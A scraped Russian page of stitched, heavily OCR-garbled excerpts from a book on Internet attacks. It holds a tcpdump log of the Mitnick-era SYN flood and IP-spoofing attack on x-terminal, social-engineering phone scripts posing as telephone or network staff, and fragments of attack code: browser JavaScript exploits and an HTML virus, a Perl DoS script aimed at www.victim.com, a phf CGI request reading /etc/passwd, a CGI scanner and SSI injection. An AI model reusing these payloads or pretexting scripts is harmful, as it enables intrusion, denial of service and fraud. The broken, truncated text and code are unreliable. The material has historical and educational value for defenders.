Log-файла запись 130.92.6.97.600 означает, что пакет передается с IP-адреса 130.92.6.97 с 600-го порта. - раздел Компьютеры, Атака через Internet. Книга 2 14:18:22.516699 130.92.6.97.600 > Server.login: S 13.82726960:1382...
14:18:22.516699 130.92.6.97.600 > server.login: S 13.82726960:1382726960(0) win 4096
14:18:22.566069 130.92.6.97.601 > server.login: S 1382726961:1382726961(0) win 4096
14:18:22.744477 130.92.6.97.602 > server.login: S 1382726962:1382726962(0) win 4096
14:18:22.830111 130.92.6.97.603 > server.login: S 1382726963:1382726963(0) win 4096
14:18:22.886128 130.92.6.97.604 > server.login: S 1382726964:1382726964(0) win 4096
14:18:22.943514 130.92.6.97.605 > server.login: S 1382726965:1382726965(0) win 4096
14:18:23.002715 130.92.6.97.606 > server.login: S 1382726966:1382726966(0) win 4096
14:18:23.103275 130.92.6.97.607 > server,login: S 1382726967:1382726967(0) win 4096
14:18:23.162781 130.92.6.97.608 > server.login: S 1382726968:1382726968(0) win 4096
14:18:23.225384 130.92.6.97.609 > server.login: S 1382726969:1382726969(0) win 4096
14:18:23.282625 130.92.6.97.610 > server.login: S 1382726970:1382726970(0) win 4096
14:18:23.342657 130.92.6.97.611 > server.login: S 1382726971:1382726971(0) win 4096 .
14:18:23.403083 130.92.6.97.612 > server.login: S 1382726972:1382726972(0) win 4096
14:18:23.903700 130.92.6.97.613 > server.login: S 1382726973:1382726973(0) win 4096
14:18:24.003252 130.92.6.97.614 > server.login: S 1382726974:1382726974(0) win 4096
14:18:24.084827 130.92.6.97.615 > server.login: S 1382726975:1382726975(0) win 4096
14:18:24.142774 130.92.6.97.616 > server.login: S 1382726976:1382726976(0) win 4096
14:18:24.203195 130.92.6.97.617 > server,login: S 1382726977:1382726977(0) win 4096
14:18:24.294773 130.92.6.97.618 > server.login: S 1382726978:1382726978(0) win 4096
14:18:24.382841 130.92.6.97.619 > server.login: S 1382726979:1382726979(0) win 4096
14:18:24.443309 130.92.6.97.620 > server.login: S 1382726980:1382726980(0) win 4096
14:18:24.643249 130.92.6.97.621 > server.login: S 1382726981:1382726981(0) win 4096
14:18:24.906546 130.92.6.97.622 > server.login: S 1382726982:1382726982(0) win 4096
14:18:24.963768 130.92.6.97.623 > server.login: S 1382726983:1382726983(0) win 4096
14:18:25.022853 130.92.6.97.624 > server.login: S 1382726984:1382726984(0) win 4096
14:18:25.153536 130.92.6.97.625 > server.login: S 1382726985:1382726985(0) win 4096
14:18:25.400869 130.92.6.97.626 > server.login: S 1382726986:1382726986(0) win 4096
14:18:25.483127 130.92.6.97.627 > server.login: S 1382726987:1382726987(0) win 4096
14:18:25.599582 130.92.6.97.628 > server.login: S 1382726988:1382726988(0) win 4096
14:18:25.653131 130.92.6.97.629 > server.login: S 1382726989:1382726989(0) win 4096
Все темы данного раздела:
Пусть каким-либо образом взломщик узнал, что у администраторе в переменную окружения PATH
включена <.> (это значит выполнены программ из текущего каталога, многие так делают для удобства работы)
Звонок администратору. Хакер: Здравствуйте, вы админ
Звонок на совершенно незнакомый номер.
Взломщик: Алло, извините, вас беспокоят с телефонной станции. Это номер такой-то? Жертва: Да.
В.: У нас идет перерегистрация абонентов, не могли бы вы сообщить, на
Паспортов и т. д. После такого разговора можно звонить сотрудникам хозяина телефона от имени его
родственников и получать дальнейшую информацию. Еще один пример. Взломщик: Алло, это приемная?
Жертва: Да.
В.: Это администрация сети. Мы
Эту информацию обычно можно просмотреть либо в программе, работающей с вашей почтой, либо в
<сыром> виде, с помощью любого текстового редактора.
Вот, что можно увидеть в этом заголовке:
From NikolayOimagine.rusk. ru Wed Jan
Пусть с объекта Х1 осуществляется реализация данной угрозы, то есть объект Х1 передает на X2, сетевое
управляющее сообщение от имени роутера - объекта Gm+1, (ребро lsm+12), где объявляет себя роутером Gm+1.
Тогда далее граф взаимодействия объектов РВС изменяется сл
Таблицу, и ARP-запросы о Ethernet-адресе маршрутизатора передаются каждые 5 минут.
Особый интерес вызвал следующий вопрос: можно ли осуществить данную удаленную атаку на UNIX-
совместимую ОС CX/LAN/SX, защищенную по классу В1 (мандатная и дискрет
Далее приводится перевод его оригинального письма с некоторыми сокращениями и нашими
комментариями:
<From: tsutomu@ariel.sdsc.edu (Tsutomu Shimomura)
Newsgroups: comp.security.misc.comp. protocols, tcp-ip, alt .security
Использованием подмены IP-адреса с целью подмены одного из абонентов соединения.
- ------------------------------------------------------------------------------------------------------
I Имеется в виду статья в New York Times под названием <
Используя предсказание закона изменения начального значения идентификатора TCP-соединения на.
хосте x-terminal, сможет получить значение АСК без получения пакета SYN-ACK:
14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) win 409
Что это соединение открыто с seiver.login. Атакующий теперь может передавать пакеты с
данными, содержащими верные значения АСК, на x-tei-minal. Далее он. посылает следующие пакеты:
14:18:37.265404 server.login > x-terminal.shell: P 0:2(2) ack 1 w
Односторонние соединения с sefuer.login, тем самым освобождая очередь запросов.
14:18:52.298431 130.92.6.97.600 > server.login: R 1382726960:1382726960(0) win 4096
14:18:52.363877 130.92.6.97.601 > server,login: R 1382726961:1382726961(0
Сетевая ОС в зависи-, мости от вычислительной мощности компьютера либо перестает реагировать на
легальные запросы на подключение (отказ в обслуживании), либо, > в худшем случае, практически зависает.
Это происходит потому, что систе-' ма должна, во-первых,
Менеджер задач показывал 100-процентную загрузку процессора);
_ удаленный доступ но сети к атакуемому серверу на любой порт оказывался невозможным;
_ на сервере из-за нехватки памяти переставали запускаться любые процессы (по
Поддерживает их открытыми в течение 30 секунд. Пока очередь заполнена (во время тайм-аута), удаленный
доступ . к FTP-серверу невозможен: в ответ на запрос клиента о подключении придет сообщение Connection
Refused (В соединении отказано). В зависимости от следующих
Итак, 18 декабря 1996 года на информационном сервере СЕКТ появились сообщения о том, что
большинство сетевых операционных систем, поддерживающих протоколы TCP/IP, обладают следующей
уязвимостью: при передаче на них IP-пакета длиной, превышающей максима
Из ОС Linux, где есть список нортов, зарезервированных для основных служб.
#
# Network services. Internet style
#
# Note that it is presently the policy of IANA to assign a single well-k
Ff 24 - private
smtp 25/tcp mail
# 26 - unassigned
time 37/tcp timserver
time 37/udp timserver
rlp39/
И 100 - reserved
hostnames 101/tcp hostname # usually from sri-nic
Iso-tsap 102/tcp tsap if part of ISODE.
csnet-ns 105/tcp cso-nsff also used by CSO name
Заключается в предоставлении удаленным пользователям информации о существующих на сервере в данный
момент соединениях. Входными параметрами ТАР-сервера являются <localport> (интересующий нас порт
сервисной службы на сервере) и <foreignport> (порт кли
I С каждым переданным пакетом значение ID в заголовке IP-пакета обычно увеличивается на 1.
- -----------------------------------------------------------------------
' хост отвечает па TCP SYN-3aiipoc TCP SYN ACK, если порт открыт; и TCP RST, если порт за
X-Hacker будет видно, что В посылает пакеты, следовательно, порт Х открыт. Выглядит это следующим
образом:
60 bytes from 194.94.94.94: flags=RA seq=17 ttl=64 id=+1 win=0 time=96 ms
60 bytes from 194.94.94.94: flags=RA seq=18 ttl=64 id=
Вызовет ответный пакет TCP RST. Хост В, получив от хоста С такой пакет, проигнорирует его. Выглядит это
так:
60 bytes from 194.94.94.94: flags=RA seq=52 ttl=64 id=+1 win=0 time=85 ms
60 bytes from 194.94.94.94: flags=RA seq=53 ttl=64 id=+1 w
Что данная угроза реализуется при помощи передачи множественных запросов на создание соединения
(виртуального капала), в результате чего переполняется очередь запросов, либо система, запятая обработкой
ответов па запросы, вообще перестает функционировать. В ч
Какого-либо ущерба данным в инфицированных хостах, были разделены на прямые и косвенные. К прямым
потерям относились:
_ остановка, тестирование и перезагрузка 42 700 машин;
_ идентификация червя, удаление, чистка памяти и восстановлени
Символов взять прописные латинские буквы (наиболее часто используемое множество), то время перебора
составило бы в среднем <всего> 3 440 лет. Заметим, однако, что на сегодняшний день скорость
оптимизированной функции crypt() на средней машине класса Pentium
Объект Policy, считывающий настройки из файла конфигурации. В этом файле можно описать, какие права
доступа связаны с той или иной подписью и/или местом расположения файлов:
grant CodeBase "http://www.somehost.corn/*", signedBy "Signer" {
Control. showConsoleO;
numplugs = (new Float((jso.eval("pcount()")).toString())).intValue();
System.out. println("nTotal number of plugins: " + numplugs + "n&quo
Использовать и для передачи содержимого на сервер через форму или каким-то другим способом.
<SCRIPT>
sl==window. open ( "Wysiwyg: //I/file: ///С I /" );
sl2=sl .window .open ():
sl2. loca
Function winopenO
{
//Можно также использовать
//a=window. open ( "view-sou rce:javascript:location=' Wysiwyg ://1/http://www. yahoo, corn' ; ");
К созданию полноценного html-вируса, размножающегося при загрузке из Сети, а не только из локального
файла, как это было с вирусом HTML.Internal:
<SCRIPT>
s="about:<SCRIPT>a=window. open С view-source: x' );a. document, o
Приводит если не к зависанию, то к сильному замедлению работы сервера. Атаки этого вида получили название
Sioux Attack (первая программа, демонстрирующая эту атаку, посылала 10 000 заголовков <User-Agent:
siouxrn>>). Вот пример скрипта на peri, реализующего ат
Документа дело просто не доходит. Подбирать нужную длину запроса можно вручную или с помощью, к
примеру, такой программы: #! /usr/bin/peri -w use Socket; $proto = getprotobynameCtcp' ); Sport = 80; $host =
"www.victim.corn"; $sin=sockaddr_in($port,i
Впрочем, многие администраторы слишком ленивы, чтобы выполнить это.
Проблема в следующем: встретив в командной строке символ перевода строки (ОхОа), он ведет себя иначе:
строка http://www.victim.com/cgi-bin/ phf?шoOacp%20/etc/passw
Со скриптами test или test-cgi, включаемыми некоторыми серверами для проверки правильности передачи
серверу переменных окружения, связана другая ошибка. Вот примерное содержимое этого скрипта: #!/bin/sh
echo SERVER_SOFIWRE = $SERVER_SOFTWARE echo
Require 5.002; use strict;
use LWP: :UserAgent:
my $PROGNAME = "latrodectus cyberneticus"; my$VERSION = "1.0"; my $DEF_CGI_BIN =
"/cgi-bin&
The WWW Black Widow was here. EOF
# Ну а здесь уже можно написать что угодно - от простого # сообщения
администратору о найденной дырке, до чего-нибудь # типа
и systeiTiC'
Действительно заполняется так, как мы и предполагали. Но проблема в том, что никто не помешает
воспользоваться клиентом, ведущим себя менее добросовестно, к примеру, вот таким скриптом: (U/usr/bin/peri -
w use Socket:
$proto^getprot
Это несомненный прогресс по сравнению с первыми версиями, просто пропускавшими SSI. Однако проблема
в том, что Apache, по крайней мере, не требует присутствия закрывающих символов <-->> для выполнения
указанной директивы, поэтому злоумышленник может доби
Помимо этого постарайтесь гарантировать соответствие ввода предусмотренному шаблону. Скажем, для того
же почтового адреса этим шаблоном может быть name@domain I .domam2, что чаще всего делается на Peri
следующим образом: die "Wrong address" if ($address i
Дополнительную информацию об использовании регулярных выражений можно найти практически в любой
книге по Peri (например: Рэндал Шварц и Том Кристиансен <Изучаем Peri> (Randal L. Schwartzh and Тот
Christiansen. Learning Peri); <Programming Peri> by
Беспокоиться.
Чтобы быть уверенными до конца, вставим в наш код проверку: if($address=-/(w[w-. ]-)@([w-.
]+)/) <
$cleanaddress = $1. '@' .$2; }
Тем не менее допускают очень многие.
Теперь об ошибках. Основной код выглядит следующим образом: ft Get the Data Number SgetJiLimber;
# Get Form Information &parse_form;
Ваш любимый браузер при заходе на любую страницу сообщает о себе весьма много информации.
На простом примере покажем скрипт на Peri, выводящий основную информацию о посетителе страницы: #!
/usr/bin/peri
print ("Content-typ
Записывать в скрытое поле для того, чтобы вставлять его в сообщение автоматически. Затем пользователь Vasya,
честно пройдя регистрацию, дает команду View source и видит следующий код:
<formaction="/cgi-bin/board.cgi"method="GET"> <input type=&
Новости и инфо для студентов